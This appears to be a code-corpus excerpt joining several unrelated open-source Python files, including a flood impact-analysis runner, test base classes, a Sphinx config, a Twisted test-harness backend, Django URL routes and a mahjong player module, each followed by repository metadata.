Nonce_Demo/impacket-0.9.12/impacket/testcases/ImpactPacket/test_IP6_Extension_Headers.py
|
Python
|
gpl-2.0
| 28,928
|
# -*- coding: utf-8 -*-
import sys
import os
import datetime
import logging
sys.path.append(os.path.abspath('..'))
# import pre processing / impact analysis
from main_dalla_auto import main_impact_analysis
from main_dalla_auto import main_impact_analysis_update
from header_config_variable import std_time_format
from jaksafe import db_con
from jaksafe import qgis_install_path
# global_conf_parser is referenced below; assumed to be exported by jaksafe too
from jaksafe import global_conf_parser
from auto_preprocessing.auto_calc_function import *
import Time as t
# import post processing
import post_processing.config as config_post
import post_processing.run as run_post
# Package QGIS
from qgis.core import *
import qgis.utils
table_name_autocalc = global_conf_parser.get('database_configuration','table_name_autocalc')
if __name__ == '__main__':
############################################################################
# IMPACT ANALYSIS
# Set current time
t0_s = datetime.datetime.strftime(datetime.datetime.now(),std_time_format)
t0_s = t.Time(t0_s)
    # Define the analysis window: t1 is fixed, t0 is six hours (6*3600 s) earlier
t1 = t.Time('20150203235959')
t0 = t.Time(t1.timeStamp()-(6*3600))
# Convert to formatted time
t1 = t1.formattedTime()
t0 = t0.formattedTime()
# logging configuration
time_0 = config_post.time_formatter(t0, '%y%m%d%H%M%S', '%Y%m%d%H%M%S')
time_1 = config_post.time_formatter(t1, '%y%m%d%H%M%S', '%Y%m%d%H%M%S')
path = config_post.Path(time_0, time_1)
if not os.path.isdir(path.log_dir):
os.makedirs(path.log_dir)
log_file = path.log_dir + 'dala_' + time_0 + '_' + time_1 + '.log'
logger = logging.getLogger('jakservice')
logger.setLevel('INFO')
fh = logging.FileHandler(log_file)
logger.addHandler(fh)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
    logger.info('AWAL PERHITUNGAN DALA')  # "start of the DALA calculation"
    logger.info('AWAL IMPACT ANALYSIS')  # "start of the impact analysis"
## default damage and loss
last_row_id = 0
# impact analysis module
try:
QgsApplication.setPrefixPath(qgis_install_path, True)
QgsApplication.initQgis()
# folder_output,t0_update = main_impact_analysis(t0,t1,db_con)
folder_output,t0_update = main_impact_analysis_update(t0,t1,db_con)
t0 = t0_update
except Exception, e:
logger.error(e)
# print 'error: %s' %e
sys.exit(1)
## Creating and writing auto calculation summary
try:
t1_s = datetime.datetime.strftime(datetime.datetime.now(),std_time_format)
t1_s = t.Time(t1_s)
last_row_id = create_summary_auto_calculation(t0,t1,db_con,table_name_autocalc,folder_output)
print "Last row id time = %d"%last_row_id
except Exception,e:
logger.error(e)
# print e
sys.exit(1)
db_con.close()
    logger.info('AKHIR IMPACT ANALYSIS')  # "end of the impact analysis"
############################################################################
# POST PROCESSING
# normalize time format
# t0 = config_post.time_formatter(t0, '%y%m%d%H%M%S', '%Y%m%d%H%M%S')
# t1 = config_post.time_formatter(t1, '%y%m%d%H%M%S', '%Y%m%d%H%M%S')
#
    # # daftar subsektor ("list of subsectors")
# o_list = config_post.ListSubsektor()
# list_subsektor = o_list.subsektor
#
# try:
# run_post.main(t0, t1, list_subsektor, last_row_id)
# QgsApplication.exitQgis()
# except Exception, e:
# logger.exception(e)
# pass
#
    # logger.info('AKHIR PERHITUNGAN DALA')  # "end of the DALA calculation"
|
frzdian/jaksafe-engine
|
jaksafe/jaksafe/jakservice/tests/test_auto_new_filename.py
|
Python
|
gpl-2.0
| 3,433
|
# This file is part of Merlin.
# Merlin is the Copyright (C)2008,2009,2010 of Robin K. Hansen, Elliot Rosemarine, Andreas Jacobsen.
# Individual portions may be copyright by individual contributors, and
# are included in this collective work with permission of the copyright
# owners.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
# List of package modules
__all__ = [
"mydef",
"showdef",
"searchdef",
"usedef",
"logdef",
]
|
ellonweb/merlin
|
Hooks/mydef/__init__.py
|
Python
|
gpl-2.0
| 1,146
|
"""
GravMag: Use the polynomial equivalent layer to upward continue gravity data
"""
from fatiando.gravmag import prism, sphere
from fatiando.gravmag.eqlayer import PELGravity, PELSmoothness
from fatiando import gridder, utils, mesher
from fatiando.vis import mpl
# Make synthetic data
props = {'density':1000}
model = [mesher.Prism(-500, 500, -1000, 1000, 500, 4000, props)]
shape = (50, 50)
x, y, z = gridder.regular([-5000, 5000, -5000, 5000], shape, z=0)
gz = utils.contaminate(prism.gz(x, y, z, model), 0.1)
# Setup the layer
layer = mesher.PointGrid([-5000, 5000, -5000, 5000], 200, (100, 100))
# Estimate the density using the PEL (it is faster and more memory efficient
# than the traditional equivalent layer).
windows = (20, 20)
degree = 1
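# (In PELGravity/PELSmoothness, windows sets how the layer is divided into
#  windows for the piecewise polynomial fit and degree is the degree of the
#  polynomial used inside each window -- our reading of the PEL parameters.)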
solver = (PELGravity(x, y, z, gz, layer, windows, degree) +
10**-21*PELSmoothness(layer, windows, degree)).fit()
layer.addprop('density', solver.estimate_)
residuals = solver.residuals()
print "Residuals:"
print "mean:", residuals.mean()
print "stddev:", residuals.std()
# Plot the layer and the fit
mpl.figure(figsize=(14, 4))
mpl.subplot(1, 3, 1)
mpl.axis('scaled')
mpl.title('Layer (kg.m^-3)')
mpl.pcolor(layer.y, layer.x, layer.props['density'], layer.shape)
mpl.colorbar()
mpl.m2km()
mpl.subplot(1, 3, 2)
mpl.axis('scaled')
mpl.title('Fit (mGal)')
levels = mpl.contour(y, x, gz, shape, 15, color='r')
mpl.contour(y, x, solver.predicted(), shape, levels, color='k')
mpl.m2km()
mpl.subplot(1, 3, 3)
mpl.title('Residuals (mGal)')
mpl.hist(residuals, bins=10)
mpl.show()
# Now I can forward model the layer at a greater height and check against the
# true solution of the prism
gz_true = prism.gz(x, y, z - 500, model)
gz_up = sphere.gz(x, y, z - 500, layer)
mpl.figure()
mpl.axis('scaled')
mpl.title('True (red) | Layer (black)')
levels = mpl.contour(y, x, gz_true, shape, 12, color='r')
mpl.contour(y, x, gz_up, shape, levels, color='k')
mpl.m2km()
mpl.show()
|
seancug/python-example
|
fatiando-0.2/cookbook/gravmag_eqlayer_pel_upcontinue.py
|
Python
|
gpl-2.0
| 1,927
|
from copy import deepcopy
import mock
from pulp.common.compat import unittest
from pulp.server.async import celery_instance
from pulp.server.db.model import TaskStatus, ReservedResource, Worker
from pulp.server.managers import factory as manager_factory
from pulp.server.managers.auth.cert.cert_generator import SerialNumber
SerialNumber.PATH = '/tmp/sn.dat'
class PulpServerTests(unittest.TestCase):
"""
Base functionality for all Pulp server-side unit tests. This should be used
in nearly all cases outside of the controllers.
"""
@classmethod
def setUpClass(cls):
manager_factory.initialize()
# This will make Celery tasks run synchronously
celery_instance.celery.conf.CELERY_ALWAYS_EAGER = True
def setUp(self):
super(PulpServerTests, self).setUp()
self._mocks = {}
self.clean()
def tearDown(self):
super(PulpServerTests, self).tearDown()
self.unmock_all()
self.clean()
def clean(self):
pass
def mock(self, parent, attribute, mock_object=None):
self._mocks.setdefault(parent, {})[attribute] = getattr(parent, attribute)
if mock_object is None:
mock_object = mock.Mock()
setattr(parent, attribute, mock_object)
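    # Hypothetical usage (names below are illustrative, not from this code):
    #     self.mock(some_module, 'some_attr')             # auto-created Mock
    #     self.mock(some_module, 'other_attr', my_stub)   # caller-supplied stub
    # unmock_all(), called from tearDown(), restores the saved originals.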
def unmock_all(self):
for parent in self._mocks:
for mocked_attr, original_attr in self._mocks[parent].items():
setattr(parent, mocked_attr, original_attr)
class RecursiveUnorderedListComparisonMixin(object):
"""
This mixin adds an assert_equal_ignoring_list_order, which is handy for comparing data
structures that are or contain lists wherein the ordering of the lists is not
significant.
"""
def assert_equal_ignoring_list_order(self, a, b):
"""
This method will compare items a and b recursively for equality, without taking
        into consideration the ordering of any lists found inside them. For example, the
following objects would be considered equal:
a = {'a_list': ['a', 'b', 'c']}
b = {'a_list': ['b', 'a', 'c']}
:param a: An object you wish to compare to b
:type a: object
:param b: An object you wish to compare to a
:type b: object
"""
def _sort_lists(a):
"""
Traverse the given object, a, and sort all lists and tuples found in the
structure.
:param a: A structure to traverse for lists, sorting them
:type a: object
:return: A representation of a that has all lists sorted
:rtype: object
"""
if isinstance(a, (list, tuple)):
# We don't want to alter the original a, so make a deepcopy
a = list(deepcopy(a))
for index, item in enumerate(a):
a[index] = _sort_lists(item)
a = sorted(a)
elif isinstance(a, dict):
for key, value in a.items():
a[key] = _sort_lists(value)
return a
self.assertEqual(_sort_lists(a), _sort_lists(b))
class TestRecursiveUnorderedListComparisonMixin(unittest.TestCase,
RecursiveUnorderedListComparisonMixin):
"""
Tests for the RecursiveUnorderedListComparisonMixin.
"""
def test_assert_equal_ignoring_list_order(self):
"""
Ensure that the recursive unordered list assertion works as expected.
"""
self.assert_equal_ignoring_list_order([1, 2, 3], [2, 1, 3])
# Test lists embedded in dictionaries
self.assert_equal_ignoring_list_order({'a_list': [1, 2, 3]}, {'a_list': [2, 1, 3]})
# Test lists of lists
self.assert_equal_ignoring_list_order([[1, 2], [3]], [[3], [2, 1]])
# These should fail
# The second list has an extra element
self.assertRaises(AssertionError, self.assert_equal_ignoring_list_order,
[1, 2, 3], [2, 1, 3, 3])
self.assertRaises(AssertionError, self.assert_equal_ignoring_list_order,
{'a_list': [1, 2, 3]}, {'a_list': [2, 1]})
self.assertRaises(AssertionError, self.assert_equal_ignoring_list_order,
[[1, 2], [3]], [[3, 3], [2, 1]])
class ResourceReservationTests(PulpServerTests):
def tearDown(self):
Worker.objects().delete()
ReservedResource.objects.delete()
TaskStatus.objects().delete()
|
rbarlow/pulp
|
server/test/unit/base.py
|
Python
|
gpl-2.0
| 4,543
|
# -*- coding: utf-8 -*-
#
# Percona XtraBackup documentation build configuration file, created by
# sphinx-quickstart on Mon Jun 27 22:27:15 2011.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.extlinks', 'sphinx.ext.todo',
'sphinx.ext.coverage', 'sphinx.ext.ifconfig']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Percona XtraBackup'
copyright = u'2009-2016, Percona LLC and/or its affiliates'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '2.3.4'
# The full version, including alpha/beta/rc tags.
release = '2.3.4'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
rst_prolog = '''
.. |check| replace:: ``|[[---CHECK---]]|``
.. |xtrabackup| replace:: :program:`xtrabackup`
.. |innobackupex| replace:: :program:`innobackupex`
.. |xbstream| replace:: :term:`xbstream`
.. |xbcrypt| replace:: :term:`xbcrypt`
.. |XtraDB| replace:: :term:`XtraDB`
.. |InnoDB| replace:: :term:`InnoDB`
.. |MyISAM| replace:: :term:`MyISAM`
.. |Percona Toolkit| replace:: *Percona Toolkit*
.. |LSN| replace:: :term:`LSN`
.. |XtraBackup| replace:: *Percona XtraBackup*
.. |Percona XtraBackup| replace:: *Percona XtraBackup*
.. |Percona XtraDB Cluster| replace:: *Percona XtraDB Cluster*
.. |Percona Server| replace:: *Percona Server*
.. |Percona| replace:: *Percona*
.. |MySQL| replace:: *MySQL*
.. |MariaDB| replace:: *MariaDB*
.. |tar4ibd| replace:: :program:`tar4ibd`
.. |tar| replace:: :program:`tar`
.. |xbcloud| replace:: *xbcloud*
'''
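# Sphinx prepends rst_prolog to every .rst source file, so all documents can
# use the substitutions above, e.g. |xtrabackup| renders as :program:`xtrabackup`.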
extlinks = {'bug': ('https://bugs.launchpad.net/percona-xtrabackup/+bug/%s',
'#'), 'mysqlbug': ('http://bugs.mysql.com/bug.php?id=%s',
'#')}
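# With this mapping, e.g. :bug:`12345` in the docs becomes a link to the
# Launchpad bug tracker with the link text "#12345".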
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'percona-theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ['.', './percona-theme']
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
html_title = 'Percona XtraBackup 2.3 Documentation'
# A shorter title for the navigation bar. Default is the same as html_title.
html_short_title = 'Percona XtraBackup 2.3 Documentation'
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
html_logo = 'percona-xtrabackup-logo.jpg'
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
html_favicon = 'percona_favicon.ico'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
html_sidebars = {
'**': ['localtoc.html', 'sourcelink.html'],
'using/windows': ['windowssidebar.html'],
}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'PerconaXtraBackupDocumentation'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'PerconaXtraBackup-2.3.tex', u'Percona XtraBackup 2.3 Documentation',
u'Percona LLC and/or its affiliates', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
latex_logo = 'percona-logo.jpg'
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
latex_use_parts = True
latex_elements = {
'classoptions': ',oneside',
'babel': '\\usepackage[english]{babel}'
}
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('xtrabackup_bin/xtrabackup_binary', 'xtrabackup', u'Percona XtraBackup 2.3 Documentation',
[u'Percona LLC and/or its affiliates'], 1),
('innobackupex/innobackupex_script', 'innobackupex', u'innobackupex Documentation',
[u'Percona LLC and/or its affiliates'], 1),
('xbcrypt/xbcrypt', 'xbcrypt', u'Percona xbcrypt Documentation',
[u'Percona LLC and/or its affiliates'], 1),
('xbstream/xbstream', 'xbstream', u'Percona xbstream Documentation',
[u'Percona LLC and/or its affiliates'], 1)
]
|
janlindstrom/percona-xtrabackup
|
storage/innobase/xtrabackup/doc/source/conf.py
|
Python
|
gpl-2.0
| 9,044
|
# Beah - Test harness. Part of Beaker project.
#
# Copyright (C) 2009 Red Hat, Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
from twisted.internet.protocol import ReconnectingClientFactory
from twisted.internet import reactor
from beah.wires.internals.twadaptors import ControllerAdaptor_Backend_JSON
from beah.wires.internals.twmisc import twisted_logging, connect_loopback
from beah import config
from beah.misc import make_log_handler, str2log_level, localhost_, parse_bool
import os
import logging
################################################################################
# FACTORY:
################################################################################
class BackendFactory(ReconnectingClientFactory):
def __init__(self, backend, controller_protocol, byef=None):
self.backend = backend
self._done = False
byef_ = byef or (lambda evt: reactor.callLater(1, reactor.stop))
def proc_evt_bye(evt):
self._done = True
if backend.controller:
backend.controller.transport.loseConnection()
byef_(evt)
backend.proc_evt_bye = proc_evt_bye
self.controller_protocol = controller_protocol
# set up ReconnectingClientFactory:
# we do not want test killed by watchdog. repeat at least every 120s.
self.maxDelay = 120
def linfo(self, fmt, *args, **kwargs):
l = [self.__class__.__name__]
l.extend(args)
logging.getLogger('backend').info('%s: '+fmt, *l, **kwargs)
########################################
# INHERITED METHODS:
########################################
def startedConnecting(self, connector):
self.linfo('Attempting to connect to beah backend')
def buildProtocol(self, addr):
self.linfo('Connected to beah backend on address %r', addr)
self.linfo('Resetting reconnection delay')
self.resetDelay()
controller = self.controller_protocol()
controller.add_backend(self.backend)
return controller
def clientConnectionLost(self, connector, reason):
self.linfo('Connection to beah backend on %s lost: %s', connector.getDestination(), reason)
self.backend.set_controller()
if not self._done:
ReconnectingClientFactory.clientConnectionLost(self, connector, reason)
def clientConnectionFailed(self, connector, reason):
self.linfo('Connection to beah backend on %s failed: %s', connector.getDestination(), reason)
self.backend.set_controller()
if not self._done:
ReconnectingClientFactory.clientConnectionFailed(self, connector, reason)
def log_handler(log_file_name=None):
conf = config.get_conf('beah-backend')
if not log_file_name:
if conf.has_option('DEFAULT', 'LOG_FILE'):
log_file_name = conf.get('DEFAULT', 'LOG_FILE')
else:
log_file_name = conf.get('DEFAULT', 'NAME') + '.log'
lp = conf.get('DEFAULT', 'LOG_PATH') or "/var/log"
log = logging.getLogger('backend')
twisted_logging(log, level=logging.WARNING)
make_log_handler(log, lp, log_file_name, syslog=True,
console=parse_bool(conf.get('DEFAULT', 'CONSOLE_LOG')))
log.setLevel(str2log_level(conf.get('DEFAULT', 'LOG')))
return log
def start_backend(backend, host=None, port=None,
adaptor=ControllerAdaptor_Backend_JSON,
byef=None):
conf = config.get_conf('beah-backend')
host = host or conf.get('DEFAULT', 'INTERFACE')
port = port or conf.get('DEFAULT', 'PORT')
if os.name == 'posix':
socket = conf.get('DEFAULT', 'SOCKET')
# 0. check SOCKET_OPT (socket given on command line)
if parse_bool(conf.get('DEFAULT', 'SOCKET_OPT')) and socket != '':
port = ''
# 1. check INTERFACE - if not empty nor localhost: must use TCP
if not localhost_(host):
socket = ''
# 2. check PORT_OPT (port given on command line)
if parse_bool(conf.get('DEFAULT', 'PORT_OPT')) and port != '':
socket = ''
else:
socket = ''
backend_factory = BackendFactory(backend, adaptor, byef)
if socket != '':
return reactor.connectUNIX(socket, backend_factory)
elif port and host:
return reactor.connectTCP(host, int(port), backend_factory)
elif port:
if not parse_bool(conf.get('DEFAULT', 'IPV6_DISABLED')):
return connect_loopback(int(port),
backend_factory)
else:
return connect_loopback(int(port),
backend_factory,
ipv6_disabled=True)
else:
raise EnvironmentError('Either socket or port must be configured.')
################################################################################
# TEST:
################################################################################
if __name__=='__main__':
from beah.core.backends import PprintBackend
from beah.core import command
class DemoOutAdaptor(ControllerAdaptor_Backend_JSON):
def linfo(self, fmt, *args, **kwargs):
l = [self.__class__.__name__]
l.extend(args)
logging.getLogger('backend').info('%s: '+fmt, *l, **kwargs)
def connectionMade(self):
self.linfo("I am connected!")
ControllerAdaptor_Backend_JSON.connectionMade(self)
self.proc_cmd(self.backend, command.PING("Hello everybody!"))
def connectionLost(self, reason):
self.linfo("I was lost!")
def lineReceived(self, data):
self.linfo('Data received. Data: %r', data)
ControllerAdaptor_Backend_JSON.lineReceived(self, data)
class DemoPprintBackend(PprintBackend):
def set_controller(self, controller=None):
PprintBackend.set_controller(self, controller)
if controller:
self.controller.proc_cmd(self, command.ping("Are you there?"))
config.backend_conf(
defaults={'NAME':'beah_demo_backend'},
overrides=config.backend_opts())
log_handler()
start_backend(DemoPprintBackend(), adaptor=DemoOutAdaptor)
reactor.run()
|
beaker-project/beah
|
beah/wires/internals/twbackend.py
|
Python
|
gpl-2.0
| 6,906
|
"""
DDTSS-Django - A Django implementation of the DDTP/DDTSS website.
Copyright (C) 2011-2014 Martijn van Oosterhout <kleptog@svana.org>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
from django.conf.urls import patterns, include, handler500, url
from django.conf import settings
from django.contrib import admin
admin.autodiscover()
from ddtp.ddtp_web import views as ddt_views
from ddtp.ddtss import urls as ddtss_urls
# Pyflakes
handler500
urlpatterns = patterns(
'',
url(r'^$', ddt_views.view_index, name='ddt_index'),
    url(r'^(\w)\.html', ddt_views.view_browse, name='ddt_overview'),
url(r'^package/([\w.+-]+)$', ddt_views.view_package, name='ddt_package'),
url(r'^source/([\w.+-]+)$', ddt_views.view_source, name='ddt_source'),
url(r'^descr/(\d+)$', ddt_views.view_descr, name='ddt_descr'),
url(r'^part/(\w+)$', ddt_views.view_part, name='ddt_part'),
url(r'^part/(\w+)/(\w+)$', ddt_views.view_onepart, name='ddt_onepart'),
url(r'^stats/milestones/(\w+)$', ddt_views.stats_milestones_lang, name='ddt_stats_milestones_lang'),
url(r'^stats/milestones/(\w+)/(.+)$', ddt_views.stats_one_milestones_lang, name='ddt_stats_one_milestones_lang'),
url(r'^descr/(\d+)/(\w+)$', ddt_views.view_transdescr, name='ddt_transdescr'),
url(r'^ddtss/', include(ddtss_urls)),
    url(r'^robots\.txt$', ddt_views.block_robots),
)
if settings.DEBUG:
urlpatterns += patterns('',
(r'^static/(?P<path>.*)$', 'django.views.static.serve',
{'document_root': settings.MEDIA_ROOT}),
)
|
kleptog/DDTSS-Django
|
src/ddtp/urls.py
|
Python
|
gpl-2.0
| 2,176
|
# -*- coding: utf-8 -*-
#
## This file is part of Invenio.
## Copyright (C) 2014 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
from invenio.modules.indexer import fixtures as default
"""Update IdxINDEXData fixtures.
.. code-block:: sql
UPDATE idxINDEX SET stemming_language='en' WHERE name
IN ('global','abstract','keyword','title','fulltext' ,'miscellaneous')
"""
for name in dir(default.IdxINDEXData):
if not name.startswith('IdxINDEX_'):
continue
index = getattr(default.IdxINDEXData, name)
    if hasattr(index, 'name') and index.name in (
            'global', 'abstract', 'keyword', 'title', 'fulltext', 'miscellaneous'):
index.stemming_language = u'en'
|
jirikuncar/invenio-demosite
|
invenio_demosite/base/fixtures/indexer.py
|
Python
|
gpl-2.0
| 1,354
|
# -*- coding: utf-8 -*-
"""
Copyright (C) 2008-2012 Wolfgang Rohdewald <wolfgang@rohdewald.de>
kajongg is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
import sys
from collections import defaultdict
from util import logException, logWarning, m18n, m18nc, m18nE
from common import WINDS, InternalParameters, elements, IntDict, Debug
from query import Transaction, Query
from tile import Tile
from meld import Meld, CONCEALED, PUNG, hasChows, meldsContent
from hand import Hand
class Players(list):
"""a list of players where the player can also be indexed by wind.
The position in the list defines the place on screen. First is on the
    screen bottom, second on the right, third top, fourth left"""
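    # e.g. players['E'] returns the player holding the East wind, while
    # players[0] returns the player seated at the screen bottom.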
allNames = {}
allIds = {}
def __init__(self, players=None):
list.__init__(self)
if players:
self.extend(players)
def __getitem__(self, index):
"""allow access by idx or by wind"""
if isinstance(index, basestring) and len(index) == 1:
for player in self:
if player.wind == index:
return player
logException("no player has wind %s" % index)
return list.__getitem__(self, index)
def __str__(self):
return ', '.join(list('%s: %s' % (x.name, x.wind) for x in self))
def byId(self, playerid):
"""lookup the player by id"""
for player in self:
if player.nameid == playerid:
return player
logException("no player has id %d" % playerid)
def byName(self, playerName):
"""lookup the player by name"""
for player in self:
if player.name == playerName:
return player
logException("no player has name %s - we have %s" % (playerName, [x.name for x in self]))
@staticmethod
def load():
"""load all defined players into self.allIds and self.allNames"""
query = Query("select id,name from player")
if not query.success:
sys.exit(1)
Players.allIds = {}
Players.allNames = {}
for nameid, name in query.records:
Players.allIds[name] = nameid
Players.allNames[nameid] = name
@staticmethod
def createIfUnknown(name):
"""create player in database if not there yet"""
if name not in Players.allNames.values():
Players.load() # maybe somebody else already added it
if name not in Players.allNames.values():
with Transaction():
Query("insert into player(name) values(?)",
list([name]))
Players.load()
assert name in Players.allNames.values()
@staticmethod
def localPlayers():
"""return a list of locally defined players like we need them
for a scoring game"""
return list(x[0] for x in Query('select name, id from player where'
' not name like "ROBOT %" and not name like "Robot %"'
' and not exists(select 1 from'
' server where server.lastname=player.name)').records)
def translatePlayerNames(self, names):
"""for a list of names, translates those names which are english
player names into the local language"""
known = set(x.name for x in self)
return list(self.byName(x).localName if x in known else x for x in names)
class Player(object):
"""all player related attributes without GUI stuff.
concealedTileNames: used during the hand for all concealed tiles, ungrouped.
concealedMelds: is empty during the hand, will be valid after end of hand,
containing the concealed melds as the player presents them."""
# pylint: disable=R0902
# pylint we need more than 10 instance attributes
# pylint: disable=R0904
# pylint we need more than 40 public methods
def __init__(self, game):
self.game = game
self.__balance = 0
self.__payment = 0
self.wonCount = 0
self.name = ''
self.wind = WINDS[0]
self.visibleTiles = IntDict(game.visibleTiles)
self.clearHand()
self.__lastSource = '1' # no source: blessing from heaven or earth
self.remote = None # only for server
self.voice = None
self.handBoard = None
def speak(self, text):
"""speak if we have a voice"""
pass
def clearHand(self):
"""clear player attributes concerning the current hand"""
self.__concealedTileNames = []
self.__exposedMelds = []
self.__concealedMelds = []
self.__bonusTiles = []
self.discarded = []
self.visibleTiles.clear()
self.newHandContent = None
self.originalCallingHand = None
self.lastTile = None
self.lastSource = '1'
self.lastMeld = Meld()
self.__mayWin = True
self.__payment = 0
self.originalCall = False
self.dangerousTiles = list()
self.claimedNoChoice = False
self.playedDangerous = False
self.usedDangerousFrom = None
self.isCalling = False
self.__hand = None
def invalidateHand(self):
"""some source for the computation of current hand changed"""
self.__hand = None
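    # Note on the @apply blocks below: a Python 2 idiom. apply() calls the
    # decorated function immediately, so each block runs once and rebinds its
    # name to property(**locals()), i.e. a property assembled from the local
    # fget/fset functions; it just keeps getter and setter grouped together.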
@apply
def hand(): # pylint: disable=E0202
"""a readonly tuple"""
def fget(self):
# pylint: disable=W0212
if not self.__hand:
self.__hand = self.computeHand()
return self.__hand
return property(**locals())
@apply
